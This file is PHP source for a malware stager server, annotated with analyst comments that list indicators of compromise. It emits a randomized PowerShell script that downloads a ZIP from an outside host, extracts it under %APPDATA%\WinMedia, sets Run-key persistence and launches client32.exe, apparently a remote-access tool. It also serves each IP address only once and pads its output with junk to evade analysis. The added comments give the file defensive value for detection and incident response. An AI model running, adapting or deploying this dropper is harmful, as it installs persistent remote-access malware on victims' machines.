<?php
// Turn off all PHP error output, so warnings and notices never appear in the response body.
error_reporting(0);
// Not referenced anywhere else in the visible code.
$antivm = "25";
// URL that gets embedded into the generated PowerShell text. mt_rand() appends a different
// `lap` query value on each request, so exact-URL matching will miss repeat fetches;
// for blocking and log searches match on host + path instead.
$urltoload = "https://www.agenciacrabli.com/yszs.zip?lap=".mt_rand(500, 7000).""; // web address of our dropper, used for downloading/running files.
/**
 * Returns a random string of 5 to 25 uppercase ASCII letters.
 *
 * The top-level code uses these strings as variable names in the script it emits,
 * so the names differ from one request to the next.
 *
 * @return string Random identifier made only of the characters A-Z.
 */
function rand_name(){
$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
$randomString = '';
// Length is chosen per call, inclusive on both ends.
$length = rand(5,25);
for ($i = 0; $i < $length; $i++) {
// Pick one character at a uniformly chosen index of the alphabet.
$randomString .= $characters[rand(0, strlen($characters) - 1)];
}
return $randomString;
}
/**
 * Returns 5000 to 8000 random ASCII letters (mixed case) used as filler text.
 *
 * random_explode() places this filler inside block comments of its output.
 * The filler carries no meaning; it only inflates and varies the emitted text.
 *
 * @return string Random letters a-z / A-Z.
 */
function trash(){ // code junk-padding function
$characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$randomString = '';
//$length = rand(1,2); // for testing
// The original comment on the next line claimed roughly 30 megabytes; each call here yields 5000-8000 characters.
$length = rand(5000,8000); // ~30 megabytes
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[rand(0, strlen($characters) - 1)];
}
return $randomString;
}
/* NO TRASHING CODE
function random_explode($string){
$size = strlen($string)-1;
$i = 0;
while($i<=$size){
$rchars = rand(1, $size-$i);
$p[] = substr($string, $i, $rchars);
$i = $i+$rchars;
}
$result = '"';
$result .= implode('"+"',$p);
$result .= '"';
return $result;
}
*/
// TRASHING CODE
/**
 * Splits $string into random-length pieces and returns them as a chain of
 * double-quoted literals joined by `+`, with trash() filler wrapped in block
 * comments before, between and after the pieces.
 *
 * Not called anywhere in the visible top-level code.
 *
 * Detection note: the output has a recognisable shape, with short quoted fragments
 * joined by `+` and separated by very long letters-only block comments.
 *
 * @param string $string Text to fragment.
 * @return string The fragmented, comment-padded concatenation expression.
 */
function random_explode($string){ // explode function for variables
$size = strlen($string)-1;
$i = 0;
// Consume the input in chunks whose length is drawn at random on each pass.
while($i<=$size){
$rchars = rand(1, $size-$i);
$p[] = substr($string, $i, $rchars);
$i = $i+$rchars;
}
// Leading filler comment, then the opening quote of the first fragment.
$result = '/* '.trash().''.trash().' */"';
// The glue between fragments is: closing quote, filler comment, `+` on its own line, filler comment, opening quote.
$result .= implode('" /*'.trash().' '.trash().' */
+
/* '.trash().''.trash().' */"',$p);
// Closing quote of the last fragment, then trailing filler comment.
$result .= '"/* '.trash().''.trash().' */';
return $result;
}
// Relative path of the file that stores one served client address per line.
// Incident-response note: if this file is recovered from the hosting server it lists the
// addresses that received the script, subject to the caveats documented on getClientIP().
define('LOG_FILE_PATH', 'count.txt');
/**
 * Returns the first public IP address found in HTTP_CLIENT_IP, HTTP_X_FORWARDED_FOR
 * or REMOTE_ADDR (checked in that order), or the string 'UNKNOWN' if none validates.
 *
 * Forensics caveat: the first two keys come from request headers supplied by the
 * client, so an address returned from them is not reliable evidence of the real
 * source. Every client whose candidates are all private or reserved addresses is
 * reported as the same value, 'UNKNOWN'.
 *
 * @return string A public IPv4/IPv6 address, or 'UNKNOWN'.
 */
function getClientIP() {
$ip_keys = ['HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR'];
foreach ($ip_keys as $key) {
if (!empty($_SERVER[$key])) {
// A header may carry a comma-separated list; each entry is tested in turn.
foreach (explode(',', $_SERVER[$key]) as $ip) {
$ip = trim($ip);
// Accept only syntactically valid addresses outside private and reserved ranges.
if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
return $ip;
}
}
}
}
return 'UNKNOWN';
}
// Serve-once gate: each client address gets the script a single time.
// Analysis note: a repeat request from an address already listed in count.txt ends here
// with an empty body, so an empty reply does not show that the URL is inactive.
$ip = getClientIP();
// Load previously served addresses, one per line; start with an empty list if the file does not exist yet.
$ips = file_exists(LOG_FILE_PATH) ? file(LOG_FILE_PATH, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) : [];
if (!in_array($ip, $ips)) {
// First visit from this address: record it and continue to script generation.
file_put_contents(LOG_FILE_PATH, $ip . "\n", FILE_APPEND);
} else {
// Address already recorded: stop without sending any output.
exit;
}
// Sixteen random identifiers, regenerated on every request. The ones that are used become
// PowerShell variable names in the emitted script, so its text differs per request.
// $var03, $var10, $var11, $var15 and $var16 are not referenced in the visible code.
$var01 = rand_name();
$var02 = rand_name();
$var03 = rand_name();
$var04 = rand_name();
$var05 = rand_name();
$var06 = rand_name();
$var07 = rand_name();
$var08 = rand_name();
$var09 = rand_name();
$var10 = rand_name();
$var11 = rand_name();
$var12 = rand_name();
$var13 = rand_name();
$var14 = rand_name();
$var15= rand_name();
$var16 = rand_name();
// Assembles, line by line, the PowerShell text that is sent back to the client.
// $code_header is not initialised before the first `.=` in the visible code.
//
// Indicators a defender can take from the emitted script (all values are literal in the lines below):
//   - directory  %APPDATA%\WinMedia\<5 random alphanumerics>\
//   - file       client32.exe inside that directory
//   - registry   HKCU:\Software\Microsoft\Windows\CurrentVersion\Run, value name WindowApplication1
//   - the variable name $dffgds, which is fixed text and does not change between requests
// NOTE(review): client32.exe is the file name used by the NetSupport Manager client; whether
// the archive actually carries that tool must be confirmed from the archive itself.

// Emitted step 1: download the archive at $urltoload into a byte array (nothing is written to disk yet).
$code_header .= '$' . $var01 . ' = "' . $urltoload . '"' . "\n";
$code_header .= '$' . $var02 . ' = (New-Object System.Net.WebClient).DownloadData($' . $var01 . ')' . "\n";
// Emitted step 2: build a 5-character random folder name and create the folder under %APPDATA%\WinMedia.
$code_header .= '$dffgds = -join ((65..90) + (97..122) + (48..57) | Get-Random -Count 5 | ForEach-Object {[char]$_})' . "\n";
$code_header .= '$' . $var04 . ' = "$env:APPDATA\WinMedia\$dffgds"' . "\n";
$code_header .= 'if (-not (Test-Path $' . $var04 . ')) {' . "\n";
$code_header .= ' New-Item -Path $' . $var04 . ' -ItemType Directory -Force | Out-Null' . "\n";
$code_header .= '}' . "\n";
// Emitted step 3: wrap the downloaded bytes in a MemoryStream and open it as a ZIP archive.
$code_header .= '$' . $var05 . ' = New-Object System.IO.MemoryStream' . "\n";
$code_header .= '$' . $var05 . '.Write($' . $var02 . ', 0, $' . $var02 . '.Length)' . "\n";
$code_header .= '$' . $var05 . '.Position = 0' . "\n";
$code_header .= 'Add-Type -AssemblyName System.IO.Compression' . "\n";
$code_header .= '$' . $var06 . ' = New-Object System.IO.Compression.ZipArchive($' . $var05 . ', [System.IO.Compression.ZipArchiveMode]::Read)' . "\n";
// Emitted step 4: write every non-empty archive entry below the new folder, creating parent folders as needed.
$code_header .= 'foreach ($' . $var07 . ' in $' . $var06 . '.Entries) {' . "\n";
$code_header .= ' $' . $var08 . ' = Join-Path $' . $var04 . ' $' . $var07 . '.FullName' . "\n";
$code_header .= ' $' . $var09 . ' = Split-Path $' . $var08 . ' -Parent' . "\n";
$code_header .= ' if (-not (Test-Path $' . $var09 . ')) {' . "\n";
$code_header .= ' New-Item -Path $' . $var09 . ' -ItemType Directory -Force | Out-Null' . "\n";
$code_header .= ' }' . "\n";
$code_header .= ' if ($' . $var07 . '.Length -gt 0) {' . "\n";
$code_header .= ' $' . $var12 . ' = $' . $var07 . '.Open()' . "\n";
$code_header .= ' $' . $var13 . ' = [System.IO.File]::Create($' . $var08 . ')' . "\n";
$code_header .= ' $' . $var12 . '.CopyTo($' . $var13 . ')' . "\n";
$code_header .= ' $' . $var13 . '.Close()' . "\n";
$code_header .= ' $' . $var12 . '.Close()' . "\n";
$code_header .= ' }' . "\n";
$code_header .= '}' . "\n";
$code_header .= '$' . $var06 . '.Dispose()' . "\n";
$code_header .= '$' . $var05 . '.Dispose()' . "\n";
// Emitted step 5: point at client32.exe in the extraction folder.
$code_header .= '$' . $var14 . ' = "$' . $var04 . '\client32.exe"' . "\n";
// Disabled alternative on the next line: a scheduled task named 'MyAutoRunTask' that would run at startup as SYSTEM.
//$code_header .= "Register-ScheduledTask -TaskName 'MyAutoRunTask' -Action (New-ScheduledTaskAction -Execute $" . $var14 . ") -Trigger (New-ScheduledTaskTrigger -AtStartup) -Principal (New-ScheduledTaskPrincipal -UserId 'SYSTEM' -RunLevel Highest) -Force" . "\n";
// Emitted step 6: per-user logon persistence. `sp` is the Set-ItemProperty alias; it writes the Run value WindowApplication1.
$code_header .= 'sp HKCU:\Software\Microsoft\Windows\CurrentVersion\Run WindowApplication1 $' . $var14 . "\n";
// Emitted step 7: launch the extracted executable immediately.
$code_header .= 'Start-Process $' . $var14 . "\n";
// The script is returned as plain text. Presumably a separate launcher (not shown here) fetches and runs it; confirm from the delivery chain.
header('Content-Type: text/plain; charset=utf-8');
echo $code_header;
/*
$code_header .= 'sp HKCU:\Software\Microsoft\Windows\CurrentVersion\Run CCleaner1 $' . $var14 . "\n";
*/
?>